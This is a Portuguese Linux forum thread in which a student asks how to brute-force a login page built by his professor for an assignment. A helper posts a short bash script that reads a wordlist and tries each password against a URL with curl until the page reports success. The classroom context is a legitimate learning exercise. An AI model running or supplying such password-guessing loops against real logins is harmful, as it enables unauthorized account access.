Denuncie   Favoritos   Indicar  

Como Fazer um ataque de força bruta [RESOLVIDO]

1. Como Fazer um ataque de força bruta [RESOLVIDO]

Roberto Marinho
HotaruNi
(usa Ubuntu)

Enviado em 17/10/2016 - 21:03h

Tenho um trabalho para fazer sobre ataque de força bruta usando o linux, mais precisamente o ubuntu. Preciso descobrir a senha de um site criado pelo meu professor usando shell script. Nesse trabalho foi dado o usuário, portanto so preciso descobrir a senha. Foi disponibilizado, também, um dicionário contendo muitas palavras.

Meu problema é: Não faço a minima ideia de como fazer, nem de como começar. Se puderem, por favor, me ajudem. Obrigado


0 0
  • Quote

    •   


    2. MELHOR RESPOSTA

    Marcelo Oliver
    msoliver
    (usa Debian)

    Enviado em 17/10/2016 - 21:16h

    HotaruNi escreveu:

    Tenho um trabalho para fazer sobre ataque de força bruta usando o linux, mais precisamente o ubuntu. Preciso descobrir a senha de um site criado pelo meu professor usando shell script. Nesse trabalho foi dado o usuário, portanto so preciso descobrir a senha. Foi disponibilizado, também, um dicionário contendo muitas palavras.

    Meu problema é: Não faço a minima ideia de como fazer, nem de como começar. Se puderem, por favor, me ajudem. Obrigado

    =====================================================================================================
    Boa noite, HotaruNi.
    Forneça mais detalhes . . .
    O ataque será via ssh?
    Palavras no dicionário . . . uma por linha?

    No aguardo.
    marcelo oliver


    0 0
  • Quote

    • 3. Re: Como Fazer um ataque de força bruta

    Roberto Marinho
    HotaruNi
    (usa Ubuntu)

    Enviado em 17/10/2016 - 21:20h

    msoliver escreveu:

    HotaruNi escreveu:

    Tenho um trabalho para fazer sobre ataque de força bruta usando o linux, mais precisamente o ubuntu. Preciso descobrir a senha de um site criado pelo meu professor usando shell script. Nesse trabalho foi dado o usuário, portanto so preciso descobrir a senha. Foi disponibilizado, também, um dicionário contendo muitas palavras.

    Meu problema é: Não faço a minima ideia de como fazer, nem de como começar. Se puderem, por favor, me ajudem. Obrigado

    =====================================================================================================
    Boa noite, HotaruNi.
    Forneça mais detalhes . . .
    O ataque será via ssh?
    Palavras no dicionário . . . uma por linha?

    No aguardo.
    marcelo oliver




    O ataque é à uma pagina que tem um formulário que passa os parametros pelo metodo GET. A pagina foi feita em php então creio que seja por http mesmo. E sim, as palavras são uma por linha.

    0 0
  • Quote

    • 4. Re: Como Fazer um ataque de força bruta

    Marcelo Oliver
    msoliver
    (usa Debian)

    Enviado em 17/10/2016 - 22:17h

    HotaruNi escreveu:

    msoliver escreveu:

    HotaruNi escreveu:

    Tenho um trabalho para fazer sobre ataque de força bruta usando o linux, mais precisamente o ubuntu.
    Preciso descobrir a senha de um site criado pelo meu professor usando shell script.
    Nesse trabalho foi dado o usuário, portanto so preciso descobrir a senha.
    Foi disponibilizado, também, um dicionário contendo muitas palavras.

    Meu problema é: Não faço a minima ideia de como fazer, nem de como começar. Se puderem, por favor, me ajudem. Obrigado

    =====================================================================================================
    Boa noite, HotaruNi.
    Forneça mais detalhes . . .
    O ataque será via ssh?
    Palavras no dicionário . . . uma por linha?

    No aguardo.
    marcelo oliver




    O ataque é à uma pagina que tem um formulário que passa os parâmetros pelo método GET.
    A pagina foi feita em php então creio que seja por http mesmo. E sim, as palavras são uma por linha.


    OK,
    Tinha "entendido ERRADO"
    Para pegar a senha do dicionário (uma a uma, obvio) é tranquilo . . .
    Estou em duvida, qto a "passar a senha".
    Acredito que o "curl", resolva ....

    Se tiver mais detalhes . . .
    Ou alguma ideia ...

    att
    marcelo oliver

    ============================================
    EDITADO.
    Sim, o curl resolve.

    Surgiu uma duvida...
    QUAL A RESPOSTA DA PáGINA para a SENHA CERTA(SUCESSO) e PARA a SENHA ERRADA (FALHA) . . .
    É necessário colocar um TESTE para interromper o SCRIPT.
    ============================================







    0 0
  • Quote

    • 5. Re: Como Fazer um ataque de força bruta [RESOLVIDO]

    Roberto Marinho
    HotaruNi
    (usa Ubuntu)

    Enviado em 18/10/2016 - 00:33h

    msoliver escreveu:

    HotaruNi escreveu:

    msoliver escreveu:

    HotaruNi escreveu:

    Tenho um trabalho para fazer sobre ataque de força bruta usando o linux, mais precisamente o ubuntu.
    Preciso descobrir a senha de um site criado pelo meu professor usando shell script.
    Nesse trabalho foi dado o usuário, portanto so preciso descobrir a senha.
    Foi disponibilizado, também, um dicionário contendo muitas palavras.

    Meu problema é: Não faço a minima ideia de como fazer, nem de como começar. Se puderem, por favor, me ajudem. Obrigado

    =====================================================================================================
    Boa noite, HotaruNi.
    Forneça mais detalhes . . .
    O ataque será via ssh?
    Palavras no dicionário . . . uma por linha?

    No aguardo.
    marcelo oliver




    O ataque é à uma pagina que tem um formulário que passa os parâmetros pelo método GET.
    A pagina foi feita em php então creio que seja por http mesmo. E sim, as palavras são uma por linha.


    OK,
    Tinha "entendido ERRADO"
    Para pegar a senha do dicionário (uma a uma, obvio) é tranquilo . . .
    Estou em duvida, qto a "passar a senha".
    Acredito que o "curl", resolva ....

    Se tiver mais detalhes . . .
    Ou alguma ideia ...

    att
    marcelo oliver

    ============================================
    EDITADO.
    Sim, o curl resolve.

    Surgiu uma duvida...
    QUAL A RESPOSTA DA PáGINA para a SENHA CERTA(SUCESSO) e PARA a SENHA ERRADA (FALHA) . . .
    É necessário colocar um TESTE para interromper o SCRIPT.
    ============================================







    Quando da senha incorreta é redirecionado pra uma página com a mensagem de senha incorreta é um link pra voltar pro formulário.
    Quando a senha está correta também é redirecionado pra uma página, mas essa mostra uma mensagem de senha correta e um link pra encerrar a sessão do login.


    0 0
  • Quote

    • 6. Re: Como Fazer um ataque de força bruta [RESOLVIDO]

    Roberto Marinho
    HotaruNi
    (usa Ubuntu)

    Enviado em 18/10/2016 - 00:35h

    msoliver escreveu:

    HotaruNi escreveu:

    msoliver escreveu:

    HotaruNi escreveu:

    Tenho um trabalho para fazer sobre ataque de força bruta usando o linux, mais precisamente o ubuntu.
    Preciso descobrir a senha de um site criado pelo meu professor usando shell script.
    Nesse trabalho foi dado o usuário, portanto so preciso descobrir a senha.
    Foi disponibilizado, também, um dicionário contendo muitas palavras.

    Meu problema é: Não faço a minima ideia de como fazer, nem de como começar. Se puderem, por favor, me ajudem. Obrigado

    =====================================================================================================
    Boa noite, HotaruNi.
    Forneça mais detalhes . . .
    O ataque será via ssh?
    Palavras no dicionário . . . uma por linha?

    No aguardo.
    marcelo oliver




    O ataque é à uma pagina que tem um formulário que passa os parâmetros pelo método GET.
    A pagina foi feita em php então creio que seja por http mesmo. E sim, as palavras são uma por linha.


    OK,
    Tinha "entendido ERRADO"
    Para pegar a senha do dicionário (uma a uma, obvio) é tranquilo . . .
    Estou em duvida, qto a "passar a senha".
    Acredito que o "curl", resolva ....

    Se tiver mais detalhes . . .
    Ou alguma ideia ...

    att
    marcelo oliver

    ============================================
    EDITADO.
    Sim, o curl resolve.

    Surgiu uma duvida...
    QUAL A RESPOSTA DA PáGINA para a SENHA CERTA(SUCESSO) e PARA a SENHA ERRADA (FALHA) . . .
    É necessário colocar um TESTE para interromper o SCRIPT.
    ============================================







    Quando da senha incorreta é redirecionado pra uma página com a mensagem de senha incorreta é um link pra voltar pro formulário.
    Quando a senha está correta também é redirecionado pra uma página, mas essa mostra uma mensagem de senha correta e um link pra encerrar a sessão do login.


    0 0
  • Quote

    • 7. Re: Como Fazer um ataque de força bruta [RESOLVIDO]

    Marcelo Oliver
    msoliver
    (usa Debian)

    Enviado em 18/10/2016 - 12:22h

    HotaruNi escreveu:
    Quando da senha incorreta é redirecionado pra uma página com a mensagem de senha incorreta é um link pra voltar pro formulário.
    Quando a senha está correta também é redirecionado pra uma página, mas essa mostra uma mensagem de senha correta e um link pra encerrar a sessão do login.

    =====================================================
    Hotaru, boa tarde.
    Segue o script . . . 

    
#!/bin/bash
    
LOGIN=""
    
URL=""
    
while read -r SENHA;do
    
let COUNT++
    
curl -s -u $LOGIN:$SENHA $URL > ARQUIVO.txt
    
if egrep -w 'correta' ARQUIVO.txt;then
    
echo -e "SENHA:$SENHA LOCALIZADA NA TENTATIVA Nº $COUNT\n"
    
break
    
else
    
continue
    
fi
    
done<dicionario.txt


    É RECOMENDADO testar antes . . .

    att.:
    marcelo oliver



    1 0
  • Quote

    • 8. Re: Como Fazer um ataque de força bruta [RESOLVIDO]

    Roberto Marinho
    HotaruNi
    (usa Ubuntu)

    Enviado em 18/10/2016 - 12:26h

    msoliver escreveu:

    HotaruNi escreveu:
    Quando da senha incorreta é redirecionado pra uma página com a mensagem de senha incorreta é um link pra voltar pro formulário.
    Quando a senha está correta também é redirecionado pra uma página, mas essa mostra uma mensagem de senha correta e um link pra encerrar a sessão do login.

    =====================================================
    Hotaru, boa tarde.
    Segue o script . . . 

    
#!/bin/bash
    
LOGIN=""
    
URL=""
    
while read -r SENHA;do
    
let COUNT++
    
curl -s -u $LOGIN:$SENHA $URL > ARQUIVO.txt
    
if egrep -w 'correta' ARQUIVO.txt;then
    
echo -e "SENHA:$SENHA LOCALIZADA NA TENTATIVA Nº $COUNT\n"
    
break
    
else
    
continue
    
fi
    
done<dicionario.txt


    É RECOMENDADO testar antes . . .

    att.:
    marcelo oliver



    Muito Obrigado.

    1 0
  • Quote

    • 9. Re: Como Fazer um ataque de força bruta [RESOLVIDO]

    Marcelo Oliver
    msoliver
    (usa Debian)

    Enviado em 18/10/2016 - 13:53h

    HotaruNi escreveu:
    Muito Obrigado.


    Ficaria muito agradecido, se marcasse como A MELHOR RESPOSTA . . . :)

    Marcelo Oliver




    1 0
  • Quote





    • Patrocínio

    Site hospedado pelo provedor RedeHost.
    Linux banner

    Destaques

    Artigos

    Enviar mensagem ao usuário trabalhando com as opções do php.ini

    Meu Fork do Plugin de Integração do CVS para o KDevelop

    Compartilhando a tela do Computador no Celular via Deskreen

    Como Configurar um Túnel SSH Reverso para Acessar Sua Máquina Local a Partir de uma Máquina Remota

    Configuração para desligamento automatizado de Computadores em um Ambiente Comercial

    Dicas

    Criando uma VPC na AWS via CLI

    Multifuncional HP imprime mas não digitaliza

    Dica básica para escrever um Artigo.

    Como Exibir Imagens Aleatórias no Neofetch para Personalizar seu Terminal

    Visualizar a árvore de arquivos no terminal

    Tópicos

    programa [RESOLVIDO] (2)

    Mint começou a apresentar varios erros (3)

    Indicação de firewall (5)

    UUID da partição efi mudou, multiboot já era...e agora? (7)

    Acabei zuando meu Linux inteiro e estou desesperado (6)

    Top 10 do mês

    Scripts

    [Shell Script] Criador de playlist

    [Shell Script] Instalador de programas

    [Python] Automação de scan de vulnerabilidades de URL

    [Python] Automação de scan de vulnerabilidades

    [Python] Script para analise de superficie de ataque

    A maior comunidade GNU/Linux da América Latina! Artigos, dicas, tutoriais, fórum, scripts e muito mais. Ideal para quem busca auto-ajuda.

    Site hospedado por: